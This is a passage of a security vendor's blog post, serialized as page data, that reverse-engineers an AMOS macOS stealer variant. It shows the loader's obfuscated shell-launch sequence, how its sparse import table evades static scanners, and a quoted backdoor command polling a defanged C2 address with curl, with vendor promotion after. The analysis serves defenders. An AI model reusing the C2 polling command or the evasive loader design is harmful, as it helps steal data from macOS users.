was.",[12,1920,1921,1922,1925],{},"This is called ",[251,1923,1924],{},"zero-after-use"," and is the same technique used in high-assurance cryptographic libraries to prevent secret key material from persisting in memory. 
Seeing it in commodity malware is unusual and indicates a developer with a security engineering background.",[186,1927,1929],{"id":1928},"the-complete-execution-sequence","The complete execution sequence:",[12,1931,192],{},[52,1933,1934],{"style":54},[56,1935,1938],{"className":1936,"code":1937,"language":61},[59],"__cstring:  \"\\x01LG@\\x01T]F\"   (7 bytes, obfuscated)\n    ↓  SIMD XOR with 0x2e (8-wide vector)\nstack:      \"/bin/zsh\\0\"         (decoded in-place, stack only)\n    ↓  _pipe() creates fd pair [read=local_60, write=local_5c]\n    ↓  _fork()\n    │\n    ├─ CHILD:  _dup2(local_60, 0)   stdin = pipe read end\n    │          _execvp(\"/bin/zsh\", [\"/bin/zsh\", \"-s\", NULL])\n    │          → /bin/zsh reads commands from stdin (= pipe)\n    │\n    └─ PARENT: loop: _write(local_5c, payload, variable_chunk)\n                     _usleep(1)\n               _close(local_5c)    close write end → EOF to shell\n               _bzero(payload, len) ← WIPE IMMEDIATELY\n               _waitpid(child, ...)\n",[63,1939,1937],{"__ignoreMap":65},[41,1941,1943],{"id":1942},"the-import-table-as-a-weapon","The Import Table as a Weapon",[12,1945,47],{},[12,1947,1948],{},"The complete import table of this binary is:",[52,1950,1951],{"style":54},[56,1952,1955],{"className":1953,"code":1954,"language":61},[59],"// C runtime / memory\n_memcpy       _memmove      _memset       _bzero\n\n// Process execution\n_fork         _execvp       _execl        __exit\n\n// IPC / pipes\n_pipe         _dup2         _close        _write\n\n// Synchronisation\n_waitpid      _usleep\n\n// Stack protection\n___stack_chk_fail    ___stack_chk_guard\n\n// C++ runtime\noperator.new    operator.delete    __Unwind_Resume\n___cxa_allocate_exception    ___cxa_throw    ___cxa_begin_catch\n___cxa_end_catch    ___cxa_free_exception    ___gxx_personality_v0\nterminate    logic_error    bad_array_new_length    __next_prime\n\n// STL containers\nappend    reserve    push_back    operator=\n\n// Dynamic 
linking\ndyld_stub_binder\n",[63,1956,1954],{"__ignoreMap":65},[12,1958,1959],{},"The total import count is 27 symbols. What is missing is as significant as what is present.",[186,1961,1963],{"id":1962},"absent-networking","Absent — networking:",[12,1965,192],{},[52,1967,1968],{"style":54},[56,1969,1972],{"className":1970,"code":1971,"language":61},[59],"socket      connect     bind        listen\naccept      send        recv        sendto\nrecvfrom    getaddrinfo gethostbyname\n",[63,1973,1971],{"__ignoreMap":65},[186,1975,1977],{"id":1976},"absent-file-system","Absent — file system:",[12,1979,192],{},[52,1981,1982],{"style":54},[56,1983,1986],{"className":1984,"code":1985,"language":61},[59],"open        read        fopen       fread\nfwrite      fclose      stat        unlink\nmkdir       rename      opendir     readdir\n",[63,1987,1985],{"__ignoreMap":65},[186,1989,1991],{"id":1990},"absent-process-introspection","Absent — process introspection:",[12,1993,192],{},[52,1995,1996],{"style":54},[56,1997,2000],{"className":1998,"code":1999,"language":61},[59],"getpid      getuid      getenv      sysctl\n",[63,2001,1999],{"__ignoreMap":65},[186,2003,2005],{"id":2004},"absent-cryptography","Absent: Cryptography",[12,2007,47],{},[52,2009,2010],{"style":54},[56,2011,2014],{"className":2012,"code":2013,"language":61},[59],"CCCrypt     SecItemAdd  SecKeychainFind\n",[63,2015,2013],{"__ignoreMap":65},[12,2017,2018,2019,805,2022,2025,2026,805,2029,2032,2033,2036],{},"In a traditional malware sample, you expect to see imports for networking (",[63,2020,2021],{},"socket",[63,2023,2024],{},"connect",") or file manipulation (",[63,2027,2028],{},"fopen",[63,2030,2031],{},"write","). This binary has ",[251,2034,2035],{},"none",". To a standard scanner, this binary looks like a harmless process launcher. 
This is a deliberate architectural choice to bypass static analysis tools that flag suspicious API usage.",[12,2038,399,2039,2041],{},[63,2040,402],{}," binary does not perform the theft itself. Its sole purpose is to drop and execute the real malicious payload: a heavily obfuscated AppleScript. A standalone EDR or AV looking for \"malicious binaries\" will see a loader with no network or file I/O capabilities and potentially grant it a \"clean\" verdict. It misses the fact that the binary is a specialized delivery system for a high-level script payload.",[22,2043],{},[25,2045,2047],{"id":2046},"the-backdoor","The Backdoor",[12,2049,31],{},[12,2051,2052,2053,2056],{},"The incident did not end after the initial compromise. Microsoft Defender telemetry showed a process running from ",[63,2054,2055],{},"/Users/\u003Credacted>/.mainhelper",", polling an external server:",[52,2058,2059],{"style":54},[56,2060,2062],{"className":262,"code":2061,"language":264,"meta":65,"style":65},"sh -c \"curl -s 'http[:]//45.94.47[.]204/api/tasks/*********************'\"\n",[63,2063,2064],{"__ignoreMap":65},[102,2065,2066,2069,2071],{"class":104,"line":105},[102,2067,2068],{"class":271},"sh",[102,2070,276],{"class":275},[102,2072,2073],{"class":289}," \"curl -s 'http[:]//45.94.47[.]204/api/tasks/*********************'\"\n",[12,2075,2076],{},"The Base64 string decodes to a 16-byte device UUID, the unique identifier assigned to this machine by the attacker's C2 infrastructure on the day of the initial infection.",[12,2078,399,2079,2082,2083,2086,2087,2089],{},[63,2080,2081],{},".mainhelper"," binary (SHA-256: ",[63,2084,2085],{},"7c6766e2b05dfbb286a1ba48ff3e766d4507254e217e8cb77343569153d63063",") had been installed by the osascript dropper via ",[63,2088,272],{}," on the day of the incident.",[22,2091],{},[25,2093,2095],{"id":2094},"the-power-of-the-collective-shield-our-exclusive-shared-threat-intelligence-platform","The Power of the Collective Shield: Our Exclusive Shared Threat 
Intelligence Platform",[12,2097,31],{},[12,2099,2100],{},"When an alert fires in our SOC, the clock doesn't just start for the affected customer, it starts for every organization under the glueckkanja shield. This investigation into a previously undocumented AMOS variant highlights the critical nature of the intelligence gap: that dangerous window where traditional vendors are blind because they haven't seen the threat yet.",[12,2102,2103],{},"This is where our proprietary Shared Threat Intelligence Platform, developed exclusively for our glueckkanja CSOC customers, proves its decisive worth. We don't wait for industry updates; we create them. While our analysts were still dismantling the final layers of the ARM64 assembly, our Automated Orchestration Engine was already distributing the extracted indicators across our entire ecosystem. This creates an immediate herd immunity effect, where a discovery at a single endpoint becomes a blocked threat for every organization we protect within minutes.",[12,2105,2106],{},"Reactive security is a relic of the past when facing threats designed to slip through the cracks of conventional defenses. The answer lies in combining human expertise with an architecture that can deploy that knowledge instantly and at scale. When these insights are channeled through our shared intelligence model, the attacker's time advantage can be transformed into a liability, protecting our customers even before a threat is recognized by the wider industry.",[22,2108],{},[2110,2111,2112,2117,2120,2123],"blockquote",{},[12,2113,2114],{},[251,2115,2116],{},"Note on Data Privacy",[12,2118,2119],{},"Identifying information has been anonymised in this publication. 
Specific technical details, indicators, and timestamps may have been slightly altered to ensure the continued protection of the affected environment while maintaining the full technical integrity of the analysis.",[12,2121,2122],{},"The technical analysis and indicators of compromise (IOCs) provided in this report are for illustrative and educational purposes only. This information is provided on a \"best effort\" basis. glueckkanja AG makes no warranties, express or implied, regarding the completeness or accuracy of the data and shall not be held liable for any damages, losses, or security incidents resulting from the use or implementation of the information, rules, or signatures shared herein. Users are strongly advised to validate all indicators and rules in a controlled environment before deployment.",[12,2124,2125],{},"Indicators and techniques described may overlap with known malware families and are not exclusive to a single campaign.",[2127,2128,2129],"style",{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code 
.sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html pre.shiki code .sVt8B, html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}",{"title":65,"searchDepth":111,"depth":111,"links":2131},[2132,2133,2134,2135,2142,2143,2144,2145,2153,2160],{"id":43,"depth":111,"text":44},{"id":85,"depth":111,"text":86},{"id":146,"depth":111,"text":147},{"id":178,"depth":111,"text":179,"children":2136},[2137,2138,2139,2140,2141],{"id":188,"depth":329,"text":189},{"id":203,"depth":329,"text":204},{"id":217,"depth":329,"text":218},{"id":226,"depth":329,"text":227},{"id":243,"depth":329,"text":244},{"id":409,"depth":111,"text":410},{"id":499,"depth":111,"text":500},{"id":615,"depth":111,"text":616},{"id":686,"depth":111,"text":687,"children":2146},[2147,2148,2149,2150,2151,2152],{"id":701,"depth":329,"text":702},{"id":992,"depth":329,"text":993},{"id":1246,"depth":329,"text":1247},{"id":1440,"depth":329,"text":1441},{"id":1527,"depth":329,"text":1528},{"id":1680,"depth":329,"text":1681},{"id":1734,"depth":111,"text":1735,"children":2154},[2155,2156,2157,2158,2159],{"id":1750,"depth":329,"text":1751},{"id":1817,"depth":329,"text":1818},{"id":1859,"depth":329,"text":1860},{"id":1901,"depth":329,"text":1902},{"id":1928,"depth":329,"text":1929},{"id":1942,"depth":111,"text":1943,"children":2161},[2162,2163,2164,2165],{"id":1962,"depth":329,"text":1963},{"id":1976,"depth":329,"text":1977},{"id":1990,"depth":329,"text":1991},{"id":2004,"depth":329,"text":2005},null,"md",false,"post",{"lang":2171,"seoTitle":2172,"titleClass":2173,"date":2174,"categories":2175,"blogtitlepic":2177,"socialimg":2178,"customExcerpt":2179,"keywords":2180,"maxContent":2181,"asideNav":2182,"footer":2198,"contactInContent":2199,"published":2181,"hreflang":2256},"en","AMOS Stealer Variant: 
Reverse Engineering an Unknown macOS Malware — Incident to Intelligence","h2-font-size","2026-04-10",[2176],"Security","head-amos-stealer.png","/blog/heads/head-amos-stealer.png","A previously undocumented AMOS stealer variant compromised a macOS endpoint. No known hashes, no C2 data in any public database. Our SOC dismantled six layers of obfuscation, extracted every indicator, and pushed protection to all SOC customers within hours, before the wider industry had even seen the sample.","AMOS stealer, macOS malware, reverse engineering, malware analysis, Ghidra, ARM64, incident response, threat intelligence, CSOC, macOS security, stealer malware, shared threat intelligence, atomic macOS stealer",true,{"menuItems":2183},[2184,2187,2190,2193,2195],{"href":2185,"text":2186},"#the-incident-a-unknown-ioc-scenario","The Incident",{"href":2188,"text":2189},"#stage-1-sandbox-checks","Stage 1: Sandbox Checks",{"href":2191,"text":2192},"#stage-2-reverse-engineering-the-helper-binary","Stage 2: Binary Analysis",{"href":2194,"text":2047},"#the-backdoor",{"href":2196,"text":2197},"#the-power-of-the-collective-shield-our-exclusive-shared-threat-intelligence-platform","Shared Threat Intelligence",{"noMargin":2181},{"quote":2181,"infos":2200},{"bgColor":2201,"headline":2202,"subline":2203,"level":41,"textStyling":2204,"flush":2205,"person":2206,"form":2212},"var(--color-blue-dark)","Get in touch","Want to know how our Shared Threat Intelligence Platform protects you from unknown malware variants before the industry even knows they exist? Let's talk.","text-light","justify-content-end",{"image":2207,"cloudinary":2181,"alt":2208,"name":2209,"quotee":2209,"quoteeTitle":2210,"quote":2211},"/people/people-jan-geisbauer-csoc.jpg","Portrait of Jan Geisbauer, Head of Security at glueckkanja","Jan Geisbauer","Head of Security","The dangerous thing about this variant wasn't the technical complexity, impressive as it is. The dangerous thing was the time window. 
Without Shared Threat Intelligence, our other customers would have been exposed for hours while we were still analyzing.",{"ctaText":2213,"cta":2214,"method":2169,"action":2216,"fields":2217},"Submit",{"skin":2215},"primary is-light","/en/successful",[2218,2222,2226,2230,2235,2240,2243,2246,2249,2252,2254],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},"Name*","name","Please enter your name.",{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},"Company*","company","Please enter your company.",{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},"Email address*","email","Please enter your email address.",{"label":2231,"type":2232,"id":2233,"required":2168,"requiredMsg":2234},"Your message","textarea","message","Please enter a message.",{"label":2236,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},"Your data will be stored with us for the purpose of processing and responding to your inquiry. For more information on data protection, please refer to our \u003Ca href=\"/en/privacy\">Privacy Policy\u003C/a>.","checkbox","dataprotection","Please confirm",{"type":2241,"id":2242,"value":2176},"hidden","_topic",{"type":2241,"id":2244,"value":2245},"_location","World",{"type":2241,"id":2247,"value":2248},"_subject","Form: Blog AMOS Stealer CSOC | EN",{"type":2241,"id":2250,"value":2251},"inbox_key","gkgab-contact-form",{"type":2241,"id":2253},"_gotcha",{"type":2241,"id":2255},"jsonData",[2257,2259,2262],{"lang":2171,"href":2258},"/en/posts/2026-04-10-incident-to-intelligence",{"lang":2260,"href":2261},"de","/de/posts/2026-04-10-incident-to-intelligence",{"lang":2263,"href":2264},"es","/es/posts/2026-04-10-incident-to-intelligence","/posts/2026-04-10-incident-to-intelligence",{"title":5,"description":14},"posts/2026-04-10-incident-to-intelligence",[2269,2270,2271,2272,2273],"Threat Intelligence","Incident Response","macOS Security","Malware Analysis","Cyber Security Operations 
Center","YhxjTaEaYLnON_zSnfg76XiU9FORX3bvv7Ydt5bo5AU",{"id":2276,"extension":2277,"meta":2278,"stem":2612,"__hash__":2613},"authors_data/authors.json","json",{"path":2279,"Alexander Schlindwein":2280,"Sophie Luna":2286,"Nadine Kern":2294,"Karsten Kleinschmidt":2301,"Julian Wendt":2307,"Holger Bunkradt":2312,"Ralf Mania":2318,"Oliver Kieselbach":2324,"Steffen Schwerdtfeger":2330,"Gunnar Winter":2338,"Jan Petersen":2343,"Thorsten Kunzi":2348,"Moritz Pohl":2352,"Thorben Pöschus":2357,"Christoph Hannebauer":2363,"Marco Scheel":2367,"Christopher Brumm":2372,"Florian Klante":2379,"Niklas Bachmann":2384,"Nils Krautkrämer":2389,"Patrick Treptau":2395,"Peter Beckendorf":2400,"Patrick Sobau":2405,"Jörg Wunderlich":2410,"Michael Breither":2414,"Christian Kanja":2419,"Zeba Hoffmann":2425,"Jochen Fröhlich":2430,"Jan Geisbauer":2434,"Gerrit Reinke":2445,"Christian Kordel":2451,"Stephan Wälde":2455,"Carolin Kanja":2460,"Adrian Ritter":2466,"Marvin Bangert":2471,"Thorsten Pickhan":2477,"Christian Lorenz":2483,"Denis Böhm":2488,"Fabian Bader":2493,"Juan Jose Fernandez Perez":2499,"Mahschid Sayyar":2504,"Benjamin Dassow":2509,"Markus Walschburger":2514,"Jonathan Haist":2519,"Daniel Rohregger":2524,"Thomas Naunheim":2529,"Florian Stöckl":2534,"Pascal Asch":2539,"Markus Kättner":2543,"Anna Ulbricht":2550,"body":2557,"title":2611,"Thorben Poeschus":2357,"Nils Krautkraemer":2389,"Joerg Wunderlich":2410,"Jochen Froehlich":2430,"Stephan Waelde":2455,"Denis Boehm":2488,"Florian Stoeckl":2534,"Markus Kaettner":2543},"/authors",{"display_name":2281,"avatar":2282,"permalink":2283,"twitter":2284,"linkedin":2285},"Alexander Schlindwein","people/people-alexander-rudolph.png","/authors/alexander-schlindwein","AlexanderOnIT","schlindwein-alexander",{"display_name":2287,"avatar":2288,"permalink":2289,"twitter":2290,"linkedin":2291,"imageOffsetLeft":2292,"imageOffsetTop":2293},"Sophie 
Luna","c_thumb,h_1600,w_1600/people/people-sophie-luna.jpg","/authors/sophie-luna","glueckkanjagab","../company/glueckkanja-gab","58%","67%",{"display_name":2295,"avatar":2296,"permalink":2297,"twitter":2298,"linkedin":2299,"imageOffsetTop":2300},"Nadine Kern","people/people-nadine-kern.png","/authors/nadine-kern","nadineausRT","nadine-kern","72%",{"display_name":2302,"avatar":2303,"permalink":2304,"twitter":2305,"linkedin":2306},"Karsten Kleinschmidt","people/people-karsten-kleinschmidt.png","/authors/karsten-kleinschmidt","KarstenonIT","karstenkleinschmidt",{"display_name":2308,"avatar":2309,"permalink":2310,"linkedin":2311},"Julian Wendt","people/people-julian-wendt.png","/authors/julian-wendt","julian-wendt",{"display_name":2313,"avatar":2314,"permalink":2315,"linkedin":2316,"twitter":2317},"Holger Bunkradt","people/people-holger-bunkradt.png","/authors/holger-bunkradt","holger-bunkradt-12b5053b","hbunkradt",{"display_name":2319,"avatar":2320,"permalink":2321,"linkedin":2322,"twitter":2323},"Ralf Mania","people/people-ralf-mania.png","/authors/ralf-mania","ralf-mania-146a2757","RaMa1976",{"display_name":2325,"avatar":2326,"permalink":2327,"linkedin":2328,"twitter":2329},"Oliver Kieselbach","people/people-oliver-kieselbach.png","/authors/oliver-kieselbach","oliver-kieselbach-a4a3409","okieselbT",{"display_name":2331,"avatar":2332,"permalink":2333,"linkedin":2334,"twitter":2335,"imageOffsetTop":2336,"imageOffsetLeft":2337},"Steffen Schwerdtfeger","people/people-steffen-schwerdtfeger.png","/authors/steffen-schwerdtfeger","steffen-schwerdtfeger","SteffenAtCloud","79%","51%",{"display_name":2339,"avatar":2340,"permalink":2341,"twitter":2290,"linkedin":2342},"Gunnar Winter","c_thumb,h_1600,w_1600/people/people-gunnar-winter.jpg","/authors/gunnar-winter","company/glueckkanja-gab",{"display_name":2344,"avatar":2345,"permalink":2346,"twitter":2290,"linkedin":2347},"Jan 
Petersen","c_thumb,h_1600,w_1600/people/jan-petersen.png","/authors/jan-petersen","jan-petersen-26a901",{"display_name":2349,"avatar":2350,"permalink":2351,"twitter":2290,"linkedin":2342,"imageOffsetTop":2300},"Thorsten Kunzi","c_thumb,h_1600,w_1600/people/author-thorsten-kunzi.png","/authors/thorsten-kunzi",{"display_name":2353,"avatar":2354,"permalink":2355,"twitter":2290,"linkedin":2356},"Dr. Moritz Pohl","c_thumb,h_1600,w_1600/people/people-moritz-pohl.png","/authors/moritz-pohl","dr-moritz-pohl",{"display_name":2358,"avatar":2359,"permalink":2360,"twitter":2361,"linkedin":2362},"Thorben Pöschus","c_thumb,h_1600,w_1600/people/thorben.poeschus.png","/authors/thorben-poeschus","TPO901","thorben-pöschus-624693b7",{"display_name":2364,"avatar":2365,"permalink":2366,"twitter":2290,"linkedin":2342,"imageOffsetTop":2300},"Dr. Christoph Hannebauer","people/people-christoph-hannebauer.png","/authors/christoph-hannebauer",{"display_name":2368,"avatar":2369,"permalink":2370,"twitter":2371,"linkedin":2371},"Marco Scheel","c_thumb,h_1600,w_1600/people/people-marco-scheel.png","/authors/marco-scheel","marcoscheel",{"display_name":2373,"avatar":2374,"permalink":2375,"twitter":2376,"linkedin":2377,"imageOffsetTop":2378},"Christopher Brumm","c_thumb,h_1600,w_1600/people/people-christopher-brumm.jpg","/authors/christopher-brumm","cbrhh","christopherbrumm","66%",{"display_name":2380,"avatar":2381,"permalink":2382,"linkedin":2383,"twitter":2290},"Florian Klante","c_thumb,h_1600,w_1600/people/florian-klante.jpg","/authors/florian-klante","florian-klante-6031b31b",{"display_name":2385,"avatar":2386,"permalink":2387,"linkedin":2388,"twitter":2290},"Niklas Bachmann","c_thumb,h_1600,w_1600/people/niklas.bachmann.png","/authors/niklas-bachmann","niklas-bachmann-66a863158",{"display_name":2390,"avatar":2391,"permalink":2392,"twitter":2393,"linkedin":2394},"Nils 
Krautkrämer","c_thumb,h_1600,w_1600/people/nils-krautkraemer.png","/authors/nils-krautkraemer","KrauNils","nils-krautkrämer-8b04bb250",{"display_name":2396,"avatar":2397,"permalink":2398,"linkedin":2399,"twitter":2290},"Patrick Treptau","c_thumb,h_1600,w_1600/people/people-patrick-treptau.png","/authors/patrick-traptau","ptreptau",{"display_name":2401,"avatar":2402,"permalink":2403,"linkedin":2404,"twitter":2290,"imageOffsetTop":2300},"Peter Beckendorf","c_thumb,h_1600,w_1600/people/peter-beckendorf.png","/authors/peter-beckendorf","peter-beckendorf-29a239b1",{"display_name":2406,"avatar":2407,"permalink":2408,"linkedin":2409,"twitter":2290},"Patrick Sobau","c_thumb,h_1600,w_1600/people/patrick-sobau.png","/authors/patrick-sobau","patrick-sobau",{"display_name":2411,"avatar":2412,"permalink":2413,"twitter":2290},"Jörg Wunderlich","c_thumb,h_1600,w_1600/people/joerg-wunderlich.png","/authors/joerg-wunderlich",{"display_name":2415,"avatar":2416,"permalink":2417,"twitter":2290,"linkedin":2418},"Michael Breither","c_thumb,h_1600,w_1600/people/people-michael-breither.jpg","/authors/michael-breither","michaelbreither",{"display_name":2420,"avatar":2421,"permalink":2422,"twitter":2423,"linkedin":2424},"Christian Kanja","c_thumb,h_1600,w_1600/people/people-christian-kanja.png","/authors/christian-kanja","cekageka","christian-kanja",{"display_name":2426,"avatar":2427,"permalink":2428,"linkedin":2429,"twitter":2290},"Zeba Hoffmann","c_thumb,h_1600,w_1600/people/zeba-hoffmann.png","/authors/zeba-hoffmann","zebahoffmann",{"display_name":2431,"avatar":2432,"permalink":2433,"twitter":2290,"linkedin":2342},"Jochen 
Fröhlich","c_thumb,h_1600,w_1600/people/people-jochen-froehlich.png","/authors/jochen-froehlich",{"display_name":2209,"avatar":2435,"permalink":2436,"twitter":2437,"linkedin":2437,"imageOffsetTop":2300,"socials":2438},"c_thumb,h_1600,w_1600/people/people-jan-geisbauer-csoc.png","/authors/jan-geisbauer","JanGeisbauer",[2439,2442],{"text":2440,"href":2441},"Blog","https://emptydc.com",{"text":2443,"href":2444},"Podcast","https://hairlessinthecloud.com",{"display_name":2446,"avatar":2447,"permalink":2448,"twitter":2449,"linkedin":2450},"Gerrit Reinke","c_thumb,h_1600,w_1600/people/gerrit-reinke.png","/authors/gerrit-reinke","GLWRe","glwr",{"display_name":2452,"avatar":2453,"permalink":2454,"twitter":2290,"linkedin":2342},"Christian Kordel","c_thumb,h_1600,w_1600/people/christian-kordel.png","/authors/christian-kordel",{"display_name":2456,"avatar":2457,"permalink":2458,"twitter":2459,"linkedin":2342},"Stephan Wälde","c_thumb,h_1600,w_1600/people/people-stephan-waelde.png","/authors/stephan-waelde","stephanwaelde",{"display_name":2461,"avatar":2462,"permalink":2463,"twitter":2464,"linkedin":2465},"Carolin Kanja","c_thumb,h_1600,w_1600/people/people-carolin-kanja.jpg","/authors/carolin-kanja","fraukanja","carolin-kanja",{"display_name":2467,"avatar":2468,"permalink":2469,"twitter":2470,"linkedin":2470},"Adrian Ritter","c_thumb,h_1600,w_1600/people/people-adrian-ritter.png","/authors/adrian-ritter","adrianritter",{"display_name":2472,"avatar":2473,"permalink":2474,"twitter":2475,"linkedin":2476},"Marvin Bangert","c_thumb,h_1600,w_1600/people/people-marvin-bangert.png","/authors/marvin-bangert","marvinbangert","marvin-bangert",{"display_name":2478,"avatar":2479,"permalink":2480,"twitter":2481,"linkedin":2482},"Thorsten Pickhan","c_thumb,h_1600,w_1600/people/people-thorsten-pickhan.png","/authors/thorsten-pickhan","tpickhan","thorsten-pickhan",{"display_name":2484,"avatar":2485,"permalink":2486,"linkedin":2487,"twitter":2290},"Christian 
Lorenz","c_thumb,h_1600,w_1600/people/people-christian-lorenz.png","/authors/christian-lorenz","christianlorenz95",{"display_name":2489,"avatar":2490,"permalink":2491,"linkedin":2492,"twitter":2290},"Denis Böhm","c_thumb,h_1600,w_1600/people/people-denis-boehm.png","/authors/denis-boehm","denis-böhm-3bb834135",{"display_name":2494,"avatar":2495,"permalink":2496,"linkedin":2497,"twitter":2498},"Fabian Bader","c_thumb,h_1600,w_1600/people/people-fabian-bader.jpg","/authors/fabian-bader","fabianbader","fabian_bader",{"display_name":2500,"avatar":2501,"permalink":2502,"linkedin":2503},"Juan Jose Fernandez Perez","c_thumb,h_1600,w_1600/people/people-juan-jose-fernandez.jpg","/authors/juan-jose-fernandez-perez","juan-jose-fernandez-perez-8016055",{"display_name":2505,"avatar":2506,"permalink":2507,"linkedin":2508},"Mahschid Sayyar","c_thumb,h_1600,w_1600/people/people-mahschid-sayyar.jpg","/authors/mahschid-sayyar","mahschid-sayyar-97544463",{"display_name":2510,"avatar":2511,"permalink":2512,"linkedin":2513},"Benjamin Dassow","c_thumb,h_1600,w_1600/people/people-benjamin-dassow.jpg","/authors/benjamin-dassow","benjamin-dassow",{"display_name":2515,"avatar":2516,"permalink":2517,"linkedin":2518},"Markus Walschburger","c_thumb,h_1600,w_1600/people/people-markus-walschburger.jpg","/authors/markus-walschburger","markus-walschburger",{"display_name":2520,"avatar":2521,"permalink":2522,"linkedin":2523,"imageOffsetTop":2300},"Jonathan Haist","c_thumb,h_1600,w_1600/people/people-jonathan-haist.jpg","/authors/jonathan-haist","jonathanhaist",{"display_name":2525,"avatar":2526,"permalink":2527,"linkedin":2528,"imageOffsetTop":2300},"Daniel Rohregger","c_thumb,h_1600,w_1600/people/people-daniel-rohregger.jpg","/authors/daniel-rohregger","drohregger",{"display_name":2530,"avatar":2531,"permalink":2532,"linkedin":2533,"imageOffsetTop":2378},"Thomas 
Naunheim","c_thumb,h_1600,w_1600/people/people-thomas-naunheim.jpg","/authors/thomas-naunheim","thomasnaunheim",{"display_name":2535,"avatar":2536,"permalink":2537,"linkedin":2538,"imageOffsetTop":2378},"Florian Stöckl","c_thumb,h_1600,w_1600/people/people-florian-stoeckl.jpg","/authors/florian-stoeckl","florianstoeckl",{"display_name":7,"avatar":2540,"permalink":2541,"linkedin":2542,"imageOffsetTop":2378},"c_thumb,h_1600,w_1600/people/Pascal.Asch.648.jpg","/authors/pascal-asch","pascal-asch",{"display_name":2544,"avatar":2545,"permalink":2546,"linkedin":2547,"imageOffsetTop":2548,"imageOffsetLeft":2549},"Markus Kättner","c_thumb,h_1600,w_1600/people/markus-kaettner.jpg","/authors/markus-kaettner","markus-kättner-b600119","62%","63%",{"display_name":2551,"avatar":2552,"permalink":2553,"linkedin":2554,"imageOffsetTop":2555,"imageOffsetLeft":2556},"Anna Ulbricht","c_thumb,h_1600,w_1600/people/anna-katharina.ulbricht-09.png","/authors/anna-ulbricht","anna-katharina-u-a67702199","70%","50%",{"Alexander Schlindwein":2558,"Sophie Luna":2559,"Nadine Kern":2560,"Karsten Kleinschmidt":2561,"Julian Wendt":2562,"Holger Bunkradt":2563,"Ralf Mania":2564,"Oliver Kieselbach":2565,"Steffen Schwerdtfeger":2566,"Gunnar Winter":2567,"Jan Petersen":2568,"Thorsten Kunzi":2569,"Moritz Pohl":2570,"Thorben Pöschus":2571,"Christoph Hannebauer":2572,"Marco Scheel":2573,"Christopher Brumm":2574,"Florian Klante":2575,"Niklas Bachmann":2576,"Nils Krautkrämer":2577,"Patrick Treptau":2578,"Peter Beckendorf":2579,"Patrick Sobau":2580,"Jörg Wunderlich":2581,"Michael Breither":2582,"Christian Kanja":2583,"Zeba Hoffmann":2584,"Jochen Fröhlich":2585,"Jan Geisbauer":2586,"Gerrit Reinke":2590,"Christian Kordel":2591,"Stephan Wälde":2592,"Carolin Kanja":2593,"Adrian Ritter":2594,"Marvin Bangert":2595,"Thorsten Pickhan":2596,"Christian Lorenz":2597,"Denis Böhm":2598,"Fabian Bader":2599,"Juan Jose Fernandez Perez":2600,"Mahschid Sayyar":2601,"Benjamin Dassow":2602,"Markus Walschburger":2603,"Jonathan 
Haist":2604,"Daniel Rohregger":2605,"Thomas Naunheim":2606,"Florian Stöckl":2607,"Pascal Asch":2608,"Markus Kättner":2609,"Anna Ulbricht":2610},{"display_name":2281,"avatar":2282,"permalink":2283,"twitter":2284,"linkedin":2285},{"display_name":2287,"avatar":2288,"permalink":2289,"twitter":2290,"linkedin":2291,"imageOffsetLeft":2292,"imageOffsetTop":2293},{"display_name":2295,"avatar":2296,"permalink":2297,"twitter":2298,"linkedin":2299,"imageOffsetTop":2300},{"display_name":2302,"avatar":2303,"permalink":2304,"twitter":2305,"linkedin":2306},{"display_name":2308,"avatar":2309,"permalink":2310,"linkedin":2311},{"display_name":2313,"avatar":2314,"permalink":2315,"linkedin":2316,"twitter":2317},{"display_name":2319,"avatar":2320,"permalink":2321,"linkedin":2322,"twitter":2323},{"display_name":2325,"avatar":2326,"permalink":2327,"linkedin":2328,"twitter":2329},{"display_name":2331,"avatar":2332,"permalink":2333,"linkedin":2334,"twitter":2335,"imageOffsetTop":2336,"imageOffsetLeft":2337},{"display_name":2339,"avatar":2340,"permalink":2341,"twitter":2290,"linkedin":2342},{"display_name":2344,"avatar":2345,"permalink":2346,"twitter":2290,"linkedin":2347},{"display_name":2349,"avatar":2350,"permalink":2351,"twitter":2290,"linkedin":2342,"imageOffsetTop":2300},{"display_name":2353,"avatar":2354,"permalink":2355,"twitter":2290,"linkedin":2356},{"display_name":2358,"avatar":2359,"permalink":2360,"twitter":2361,"linkedin":2362},{"display_name":2364,"avatar":2365,"permalink":2366,"twitter":2290,"linkedin":2342,"imageOffsetTop":2300},{"display_name":2368,"avatar":2369,"permalink":2370,"twitter":2371,"linkedin":2371},{"display_name":2373,"avatar":2374,"permalink":2375,"twitter":2376,"linkedin":2377,"imageOffsetTop":2378},{"display_name":2380,"avatar":2381,"permalink":2382,"linkedin":2383,"twitter":2290},{"display_name":2385,"avatar":2386,"permalink":2387,"linkedin":2388,"twitter":2290},{"display_name":2390,"avatar":2391,"permalink":2392,"twitter":2393,"linkedin":2394},{"display_nam
